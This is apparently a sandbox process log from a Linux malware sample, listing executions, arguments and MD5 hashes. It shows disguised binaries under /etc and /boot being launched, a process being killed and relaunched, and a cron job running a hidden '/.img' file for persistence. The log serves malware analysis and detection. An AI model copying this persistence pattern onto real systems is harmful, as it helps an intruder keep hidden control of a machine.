                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/sh
                                                                                                                      Arguments:sh -c /etc/32678&
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                      Start time (UTC):19:38:13
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/sh
                                                                                                                      Arguments:-
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                      Start time (UTC):19:38:13
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/etc/32678
                                                                                                                      Arguments:/etc/32678
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                      Start time (UTC):19:38:14
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/etc/32678
                                                                                                                      Arguments:-
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                      Start time (UTC):19:38:14
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/sleep
                                                                                                                      Arguments:sleep 60
                                                                                                                      File size:39256 bytes
                                                                                                                      MD5 hash:fcba58db24e5e3672c4d70a3bb01d7a4
                                                                                                                      Start time (UTC):19:39:14
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/etc/32678
                                                                                                                      Arguments:-
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                      Start time (UTC):19:39:14
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/etc/id.services.conf
                                                                                                                      Arguments:/etc/id.services.conf
                                                                                                                      File size:5251072 bytes
                                                                                                                      MD5 hash:4b53bd2b79fc8f18d1a5e591358bcfb9
                                                                                                                      Start time (UTC):19:39:14
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/etc/id.services.conf
                                                                                                                      Arguments:-
                                                                                                                      File size:5251072 bytes
                                                                                                                      MD5 hash:4b53bd2b79fc8f18d1a5e591358bcfb9
                                                                                                                      Start time (UTC):19:39:14
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/pkill
                                                                                                                      Arguments:pkill -9 32678
                                                                                                                      File size:30968 bytes
                                                                                                                      MD5 hash:fa96a75a08109d8842e4865b2907d51f
                                                                                                                      Start time (UTC):19:39:17
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/etc/id.services.conf
                                                                                                                      Arguments:-
                                                                                                                      File size:5251072 bytes
                                                                                                                      MD5 hash:4b53bd2b79fc8f18d1a5e591358bcfb9
                                                                                                                      Start time (UTC):19:39:17
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/sh
                                                                                                                      Arguments:sh -c /etc/32678&
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                      Start time (UTC):19:39:18
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/sh
                                                                                                                      Arguments:-
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                      Start time (UTC):19:39:18
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/etc/32678
                                                                                                                      Arguments:/etc/32678
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                      Start time (UTC):19:39:18
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/etc/32678
                                                                                                                      Arguments:-
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                      Start time (UTC):19:39:18
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/sleep
                                                                                                                      Arguments:sleep 60
                                                                                                                      File size:39256 bytes
                                                                                                                      MD5 hash:fcba58db24e5e3672c4d70a3bb01d7a4
                                                                                                                      Start time (UTC):19:39:17
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/etc/id.services.conf
                                                                                                                      Arguments:-
                                                                                                                      File size:5251072 bytes
                                                                                                                      MD5 hash:4b53bd2b79fc8f18d1a5e591358bcfb9
                                                                                                                      Start time (UTC):19:39:17
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/service
                                                                                                                      Arguments:service crond start
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                      Start time (UTC):19:39:18
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/service
                                                                                                                      Arguments:-
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                      Start time (UTC):19:39:18
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/basename
                                                                                                                      Arguments:basename /usr/sbin/service
                                                                                                                      File size:39256 bytes
                                                                                                                      MD5 hash:3283660e59f128df18bec9b96fbd4d41
                                                                                                                      Start time (UTC):19:39:18
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/service
                                                                                                                      Arguments:-
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                      Start time (UTC):19:39:18
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/basename
                                                                                                                      Arguments:basename /usr/sbin/service
                                                                                                                      File size:39256 bytes
                                                                                                                      MD5 hash:3283660e59f128df18bec9b96fbd4d41
                                                                                                                      Start time (UTC):19:39:18
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/service
                                                                                                                      Arguments:-
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                      Start time (UTC):19:39:18
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/systemctl
                                                                                                                      Arguments:systemctl --quiet is-active multi-user.target
                                                                                                                      File size:996584 bytes
                                                                                                                      MD5 hash:4deddfb6741481f68aeac522cc26ff4b
                                                                                                                      Start time (UTC):19:39:18
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/service
                                                                                                                      Arguments:-
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                      Start time (UTC):19:39:18
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/service
                                                                                                                      Arguments:-
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                      Start time (UTC):19:39:18
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/systemctl
                                                                                                                      Arguments:systemctl list-unit-files --full --type=socket
                                                                                                                      File size:996584 bytes
                                                                                                                      MD5 hash:4deddfb6741481f68aeac522cc26ff4b
                                                                                                                      Start time (UTC):19:39:18
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/service
                                                                                                                      Arguments:-
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                      Start time (UTC):19:39:18
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/sed
                                                                                                                      Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                                                                                                                      File size:121288 bytes
                                                                                                                      MD5 hash:885062561f66aa1d4af4c54b9e7cc81a
                                                                                                                      Start time (UTC):19:39:20
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/systemctl
                                                                                                                      Arguments:systemctl start crond.service
                                                                                                                      File size:996584 bytes
                                                                                                                      MD5 hash:4deddfb6741481f68aeac522cc26ff4b
                                                                                                                      Start time (UTC):19:39:18
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/etc/id.services.conf
                                                                                                                      Arguments:-
                                                                                                                      File size:5251072 bytes
                                                                                                                      MD5 hash:4b53bd2b79fc8f18d1a5e591358bcfb9
                                                                                                                      Start time (UTC):19:39:18
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/etc/id.services.conf
                                                                                                                      Arguments:/etc/id.services.conf
                                                                                                                      File size:5251072 bytes
                                                                                                                      MD5 hash:4b53bd2b79fc8f18d1a5e591358bcfb9
                                                                                                                      Start time (UTC):19:38:13
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/boot/System.img.config
                                                                                                                      Arguments:-
                                                                                                                      File size:5251072 bytes
                                                                                                                      MD5 hash:4b53bd2b79fc8f18d1a5e591358bcfb9
                                                                                                                      Start time (UTC):19:38:13
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/service
                                                                                                                      Arguments:service crond start
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                      Start time (UTC):19:38:13
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/service
                                                                                                                      Arguments:-
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                      Start time (UTC):19:38:13
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/basename
                                                                                                                      Arguments:basename /usr/sbin/service
                                                                                                                      File size:39256 bytes
                                                                                                                      MD5 hash:3283660e59f128df18bec9b96fbd4d41
                                                                                                                      Start time (UTC):19:38:14
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/service
                                                                                                                      Arguments:-
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                      Start time (UTC):19:38:14
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/basename
                                                                                                                      Arguments:basename /usr/sbin/service
                                                                                                                      File size:39256 bytes
                                                                                                                      MD5 hash:3283660e59f128df18bec9b96fbd4d41
                                                                                                                      Start time (UTC):19:38:14
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/service
                                                                                                                      Arguments:-
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                      Start time (UTC):19:38:14
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/systemctl
                                                                                                                      Arguments:systemctl --quiet is-active multi-user.target
                                                                                                                      File size:996584 bytes
                                                                                                                      MD5 hash:4deddfb6741481f68aeac522cc26ff4b
                                                                                                                      Start time (UTC):19:38:14
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/service
                                                                                                                      Arguments:-
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                      Start time (UTC):19:38:14
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/service
                                                                                                                      Arguments:-
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                      Start time (UTC):19:38:14
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/systemctl
                                                                                                                      Arguments:systemctl list-unit-files --full --type=socket
                                                                                                                      File size:996584 bytes
                                                                                                                      MD5 hash:4deddfb6741481f68aeac522cc26ff4b
                                                                                                                      Start time (UTC):19:38:14
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/service
                                                                                                                      Arguments:-
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                      Start time (UTC):19:38:14
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/sed
                                                                                                                      Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                                                                                                                      File size:121288 bytes
                                                                                                                      MD5 hash:885062561f66aa1d4af4c54b9e7cc81a
                                                                                                                      Start time (UTC):19:38:29
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/bin/systemctl
                                                                                                                      Arguments:systemctl start crond.service
                                                                                                                      File size:996584 bytes
                                                                                                                      MD5 hash:4deddfb6741481f68aeac522cc26ff4b
                                                                                                                      Start time (UTC):19:38:13
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/boot/System.img.config
                                                                                                                      Arguments:-
                                                                                                                      File size:5251072 bytes
                                                                                                                      MD5 hash:4b53bd2b79fc8f18d1a5e591358bcfb9
                                                                                                                      Start time (UTC):19:38:13
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/boot/System.img.config
                                                                                                                      Arguments:/boot/System.img.config
                                                                                                                      File size:5251072 bytes
                                                                                                                      MD5 hash:4b53bd2b79fc8f18d1a5e591358bcfb9
                                                                                                                      Start time (UTC):19:38:16
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/sshd
                                                                                                                      Arguments:-
                                                                                                                      File size:876328 bytes
                                                                                                                      MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340
                                                                                                                      Start time (UTC):19:38:16
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/sshd
                                                                                                                      Arguments:/usr/sbin/sshd -D -R
                                                                                                                      File size:876328 bytes
                                                                                                                      MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340
                                                                                                                      Start time (UTC):19:38:19
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/sshd
                                                                                                                      Arguments:-
                                                                                                                      File size:876328 bytes
                                                                                                                      MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340
                                                                                                                      Start time (UTC):19:38:19
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/sshd
                                                                                                                      Arguments:/usr/sbin/sshd -D -R
                                                                                                                      File size:876328 bytes
                                                                                                                      MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340
                                                                                                                      Start time (UTC):19:38:22
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/sshd
                                                                                                                      Arguments:-
                                                                                                                      File size:876328 bytes
                                                                                                                      MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340
                                                                                                                      Start time (UTC):19:38:24
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/lib/udisks2/udisksd
                                                                                                                      Arguments:-
                                                                                                                      File size:483056 bytes
                                                                                                                      MD5 hash:1d7ae439cc3d82fa6b127671ce037a24
                                                                                                                      Start time (UTC):19:38:24
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/dumpe2fs
                                                                                                                      Arguments:dumpe2fs -h /dev/dm-0
                                                                                                                      File size:31112 bytes
                                                                                                                      MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4
                                                                                                                      Start time (UTC):19:38:29
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/sshd
                                                                                                                      Arguments:-
                                                                                                                      File size:876328 bytes
                                                                                                                      MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340
                                                                                                                      Start time (UTC):19:38:29
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/sshd
                                                                                                                      Arguments:/usr/sbin/sshd -D -R
                                                                                                                      File size:876328 bytes
                                                                                                                      MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340
                                                                                                                      Start time (UTC):19:38:30
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/sshd
                                                                                                                      Arguments:-
                                                                                                                      File size:876328 bytes
                                                                                                                      MD5 hash:dbca7a6bbf7bf57fedac243d4b2cb340
                                                                                                                      Start time (UTC):19:38:34
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/lib/systemd/systemd
                                                                                                                      Arguments:-
                                                                                                                      File size:1620224 bytes
                                                                                                                      MD5 hash:9b2bec7092a40488108543f9334aab75
                                                                                                                      Start time (UTC):19:38:34
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/cron
                                                                                                                      Arguments:/usr/sbin/cron -f
                                                                                                                      File size:55944 bytes
                                                                                                                      MD5 hash:2c82564ff5cc862c89392b061c7fbd59
                                                                                                                      Start time (UTC):19:39:01
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/cron
                                                                                                                      Arguments:-
                                                                                                                      File size:55944 bytes
                                                                                                                      MD5 hash:2c82564ff5cc862c89392b061c7fbd59
                                                                                                                      Start time (UTC):19:39:02
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/cron
                                                                                                                      Arguments:-
                                                                                                                      File size:55944 bytes
                                                                                                                      MD5 hash:2c82564ff5cc862c89392b061c7fbd59
                                                                                                                      Start time (UTC):19:39:02
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/bin/sh
                                                                                                                      Arguments:/bin/sh -c "/.img "
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                      Start time (UTC):19:39:02
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/bin/sh
                                                                                                                      Arguments:-
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                      Start time (UTC):19:39:01
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/cron
                                                                                                                      Arguments:-
                                                                                                                      File size:55944 bytes
                                                                                                                      MD5 hash:2c82564ff5cc862c89392b061c7fbd59
                                                                                                                      Start time (UTC):19:39:02
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/cron
                                                                                                                      Arguments:-
                                                                                                                      File size:55944 bytes
                                                                                                                      MD5 hash:2c82564ff5cc862c89392b061c7fbd59
                                                                                                                      Start time (UTC):19:39:02
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/bin/sh
                                                                                                                      Arguments:/bin/sh -c " [ -x /usr/lib/php/sessionclean ] && if [ ! -d /run/systemd/system ]; then /usr/lib/php/sessionclean; fi"
                                                                                                                      File size:129816 bytes
                                                                                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
                                                                                                                      Start time (UTC):19:39:02
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/lib/systemd/systemd
                                                                                                                      Arguments:-
                                                                                                                      File size:1620224 bytes
                                                                                                                      MD5 hash:9b2bec7092a40488108543f9334aab75
                                                                                                                      Start time (UTC):19:39:02
                                                                                                                      Start date (UTC):27/10/2024
                                                                                                                      Path:/usr/sbin/cron
                                                                                                                      Arguments:/usr/sbin/cron -f
                                                                                                                      File size:55944 bytes
                                                                                                                      MD5 hash:2c82564ff5cc862c89392b061c7fbd59